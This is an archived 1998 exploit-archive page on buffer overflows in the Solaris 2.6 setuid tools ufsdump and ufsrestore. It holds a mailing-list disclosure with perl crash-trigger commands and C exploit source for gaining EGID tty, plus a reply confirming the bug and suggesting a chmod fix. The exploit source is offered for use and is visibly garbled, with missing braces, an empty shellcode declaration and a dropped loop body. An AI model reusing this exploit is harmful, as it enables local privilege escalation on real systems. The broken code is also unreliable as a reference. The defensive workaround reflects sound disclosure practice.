Overflows in Solaris ufsdump and ufsrestore binaries

Description:Standard buffer overflow (in device name passed as arguments)
Author:Seth McGann <smm@WPI.EDU>
Compromise:Get UID of tty (local)
Vulnerable Systems:Solaris 2.6/SPARC, opinions differed on whether 2.6/X86 is vulnerable.
Date:23 April 1998

Date: Thu, 23 Apr 1998 14:19:13 -0400
From: Seth McGann <smm@WPI.EDU>
Subject: Buffer overflows in Solaris 2.6 ufsdump and ufsrestore

  While auditing some suid binaries on Solaris 2.6 x86 I came across some interresting bugs.  Firstly, /usr/lib/fs/ufs/ufsdump will segfault if passed a device name of sufficent length.  Straight forward overflow.  When the shellcode executes /bin/id, it says the egid=tty.  I guess its nice to be tty, even if we can't be root :(
The second problem, /usr/lib/fs/ufs/ufsrestore also segfaults when passed a device name of sufficent length.  However, on inspection with  gdb it is evident that once the EIP is overwritten, execution jumps to 0x0.  I didn't look at it too close, maybe someone out there can exploit it (or at least enlighten me as to the odd behavior)?

Thanks to Jesse Schachter for letting me use his box as my test dummy.
Oh yeah, any bugs are ScriptKiddie counter-measures.

to test the vulnerability:
/usr/lib/fs/ufs/ufsdump 1 `perl -e 'print "a" x 2000'`
/usr/lib/fs/ufs/ufsrestore xf `perl -e 'print "a" x 2000'`

Here's the exploit for ufsdump:


/* ufsdump.c
* Description:  Overflows a buffer to give you EGID=tty.
* At least that's what id reports.
* The running shell thinks its still the user.  Maybe I'm
* doing something wrong?  At any
* rate,  here ya go, have fun.
*  smm@wpi.edu
*  Thanks to: Jesse Schachter for the box, and
*  Unknown parties for the shellcode. (probably Aleph1).

#include <stdio.h>
static inline getesp() {
  __asm__(" movl %esp,%eax ");
main(int argc, char **argv) {
  int i,j,buffer,offset;
  long unsigned esp;
  char unsigned buf[4096];
  unsigned char
  if (argc>1)buffer=atoi(argv[1]);
  if (argc>2)offset=atoi(argv[2]);
  for (i=0;i<buffer;i++)
     buf[i]=0x41;  /* inc ecx */
  for (i=buffer;i<buffer+strlen(shellcode);i++)
  buf[i]=esp & 0xFF;
  buf[i+1]=(esp >> 8) & 0xFF;
  buf[i+2]=(esp >> 16) & 0xFF;
  buf[i+3]=(esp >> 24) & 0xFF;
  buf[i+4]=esp & 0xFF;
  buf[i+5]=(esp >> 8) & 0xFF;
  buf[i+6]=(esp >> 16) & 0xFF;
  buf[i+7]=(esp >> 24) & 0xFF;
  printf("Offset: 0x%x\n\n",esp);
Date: Thu, 23 Apr 1998 20:50:53 +0000
From: Eugene Bradley <eugene.bradley@erols.com>
Subject: Re: Buffer overflows in Solaris 2.6 ufsdump and ufsrestore

I confirmed the segmentation fault for Solaris 2.6 SPARC on a Sun
Ultra Enterprise 2 box running Solaris 2.6 with the current
(4/8) recommended & security patch cluster, plus the following
patches specific to ufsdump and ufsrestore [1]:

105722-01: SunOS 5.6: /usr/lib/fs/ufs/ufsdump patch
105724-01: SunOS 5.6: /usr/lib/fs/ufs/ufsrestore patch

I have an open ticket with SunService on this vulnerability.
Best fix I know of for now:

chmod ug-s /usr/lib/fs/ufs/ufsdump
chmod u-s /usr/lib/fs/ufs/ufsrestore

Unfortunately, my job doesn't use gcc for development, so I was
unable to compile ufsdump.c at all to test for tty or even
root shell exploitation.

Eugene Bradley
eugene.bradley@geocities.com (Personal ONLY!)

[1]You need a SunService contract *and* a valid registration at
http://sunsolve.sun.com/sunsolve/contractservices.html to
obtain these patches.

Eugene Bradley
eugene.bradley@erols.com (Personal ONLY!)
eugenebradley@geocities.com (everything else)

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]